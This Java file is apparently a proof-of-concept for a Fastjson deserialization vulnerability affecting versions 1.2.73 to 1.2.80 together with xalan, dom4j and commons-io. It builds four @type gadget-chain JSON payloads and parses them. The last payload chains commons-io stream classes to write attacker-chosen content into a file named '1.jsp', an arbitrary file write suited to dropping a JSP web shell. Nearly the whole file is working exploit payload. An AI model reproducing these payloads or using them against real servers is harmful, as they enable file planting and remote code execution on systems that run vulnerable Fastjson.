package test;

import com.alibaba.fastjson.JSON;


public class Fastjson29_xalan_dom4j_io_write_1 {
    public static void main(String[] args) throws Exception {
    	String code = "test";
        for (int i = 0; i < 8200; i++) {
			code += "a";
		}
        //依赖1.2.73-1.2.80 xalan-2.7.2 dom4j-2.1.3  commons-io-2.0-2.6
        String poc1 = "{\r\n"
        		+ "		\"@type\": \"java.lang.Exception\",\r\n"
        		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
        		+ "}";
        String poc2 = "{\r\n"
        		+ "		\"@type\": \"java.lang.Class\",\r\n"
        		+ "		\"val\": {\r\n"
        		+ "			\"@type\": \"java.lang.String\" {\r\n"
        		+ "				\"@type\": \"java.util.Locale\",\r\n"
        		+ "				\"val\": {\r\n"
        		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
        		+ "					{\r\n"
        		+ "						\"@type\": \"java.lang.String\"\r\n"
        		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
        		+ "						\"locator\": {}\r\n"
        		+ "					}\r\n"
        		+ "				}\r\n"
        		+ "			}";
        String poc3 = "{\r\n"
        		+ "	\"su14\": {\r\n"
        		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
        		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
        		+ "		\"nodeIter\": {\r\n"
        		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
        		+ "		},\r\n"
        		+ "		\"xctxt\": {\r\n"
        		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
        		+ "			\"primaryReader\": {\r\n"
        		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
        		+ "				\"entityResolver\": {\r\n"
        		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
        		+ "					\"inputSource\": {\r\n"
        		+ "						\"byteStream\": {\r\n"
        		+ "							\"@type\": \"java.io.InputStream\"\r\n"
        		+ "						}\r\n"
        		+ "					}\r\n"
        		+ "				}\r\n"
        		+ "			}\r\n"
        		+ "		}\r\n"
        		+ "	}\r\n"
        		+ "}";
        
        String poc4 = "{\r\n"
        		+ "	\"su16\": {\r\n"
        		+ "		\"@type\": \"java.io.InputStream\",\r\n"
        		+ "		\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
        		+ "		\"delegate\": {\r\n"
        		+ "			\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
        		+ "			\"reader\": {\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
        		+ "				\"is\": {\r\n"
        		+ "					\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
        		+ "					\"input\": {\r\n"
        		+ "						\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
        		+ "						\"reader\": {\r\n"
        		+ "							\"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
        		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"
        		+ "      },\r\n"
        		+ "      \"charsetName\":\"UTF-8\",\r\n"
        		+ "      \"bufferSize\":1024\r\n"
        		+ "						},\r\n"
        		+ "						\"branch\": {\r\n"
        		+ "							\"@type\": \"org.apache.commons.io.output.WriterOutputStream\",\r\n"
        		+ "							\"writer\": {\r\n"
        		+ "								\"@type\": \"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
        		+ "								\"file\": \"1.jsp\",\r\n"
        		+ "								\"encoding\": \"UTF-8\",\r\n"
        		+ "								\"append\": false\r\n"
        		+ "							},\r\n"
        		+ "							\"charsetName\": \"UTF-8\",\r\n"
        		+ "							\"bufferSize\": 1024,\r\n"
        		+ "							\"writeImmediately\": true\r\n"
        		+ "						},\r\n"
        		+ "						\"closeBranch\": true\r\n"
        		+ "					},\r\n"
        		+ "					\"httpContentType\": \"text/xml\",\r\n"
        		+ "					\"lenient\": false,\r\n"
        		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
        		+ "				},\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bufferSize\": 1024\r\n"
        		+ "			},\r\n"
        		+ "			\"boms\": [{\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bytes\": [\r\n"
        		+ "					36, 82\r\n"
        		+ "				]\r\n"
        		+ "			}]\r\n"
        		+ "		},\r\n"
        		+ "		\"su17\": {\r\n"
        		+ "			\"@type\": \"java.io.InputStream\",\r\n"
        		+ "			\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
        		+ "			\"delegate\": {\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
        		+ "				\"reader\": {\r\n"
        		+ "					\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
        		+ "					\"is\": {\r\n"
        		+ "						\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
        		+ "						\"input\": {\r\n"
        		+ "							\"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
        		+ "						},\r\n"
        		+ "						\"branch\": {\r\n"
        		+ "							\"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
        		+ "						},\r\n"
        		+ "						\"closeBranch\": true\r\n"
        		+ "					},\r\n"
        		+ "					\"httpContentType\": \"text/xml\",\r\n"
        		+ "					\"lenient\": false,\r\n"
        		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
        		+ "				},\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bufferSize\": 1024\r\n"
        		+ "			},\r\n"
        		+ "			\"boms\": [{\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bytes\": [\r\n"
        		+ "					36, 82\r\n"
        		+ "				]\r\n"
        		+ "			}]\r\n"
        		+ "		},\r\n"
        		+ "		\"su18\": {\r\n"
        		+ "			\"@type\": \"java.io.InputStream\",\r\n"
        		+ "			\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
        		+ "			\"delegate\": {\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
        		+ "				\"reader\": {\r\n"
        		+ "					\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
        		+ "					\"is\": {\r\n"
        		+ "						\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
        		+ "						\"input\": {\r\n"
        		+ "							\"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
        		+ "						},\r\n"
        		+ "						\"branch\": {\r\n"
        		+ "							\"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
        		+ "						},\r\n"
        		+ "						\"closeBranch\": true\r\n"
        		+ "					},\r\n"
        		+ "					\"httpContentType\": \"text/xml\",\r\n"
        		+ "					\"lenient\": false,\r\n"
        		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
        		+ "				},\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bufferSize\": 1024\r\n"
        		+ "			},\r\n"
        		+ "			\"boms\": [{\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bytes\": [\r\n"
        		+ "					36, 82\r\n"
        		+ "				]\r\n"
        		+ "			}]\r\n"
        		+ "		},\r\n"
        		+ "		\"su19\": {\r\n"
        		+ "			\"@type\": \"java.io.InputStream\",\r\n"
        		+ "			\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
        		+ "			\"delegate\": {\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
        		+ "				\"reader\": {\r\n"
        		+ "					\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
        		+ "					\"is\": {\r\n"
        		+ "						\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
        		+ "						\"input\": {\r\n"
        		+ "							\"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
        		+ "						},\r\n"
        		+ "						\"branch\": {\r\n"
        		+ "							\"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
        		+ "						},\r\n"
        		+ "						\"closeBranch\": true\r\n"
        		+ "					},\r\n"
        		+ "					\"httpContentType\": \"text/xml\",\r\n"
        		+ "					\"lenient\": false,\r\n"
        		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
        		+ "				},\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bufferSize\": 1024\r\n"
        		+ "			},\r\n"
        		+ "			\"boms\": [{\r\n"
        		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
        		+ "				\"charsetName\": \"UTF-8\",\r\n"
        		+ "				\"bytes\": [\r\n"
        		+ "					36, 82\r\n"
        		+ "				]\r\n"
        		+ "			}]\r\n"
        		+ "		}\r\n"
        		+ "	}";
        
        System.out.println(poc1);
        System.out.println(poc2);
        System.out.println(poc3);
        System.out.println(poc4);
        try {
        	JSON.parseObject(poc1);
		} catch (Exception e) {
		}
        JSON.parseObject(poc2);
        JSON.parseObject(poc3);
        JSON.parseObject(poc4);
        
    }
}
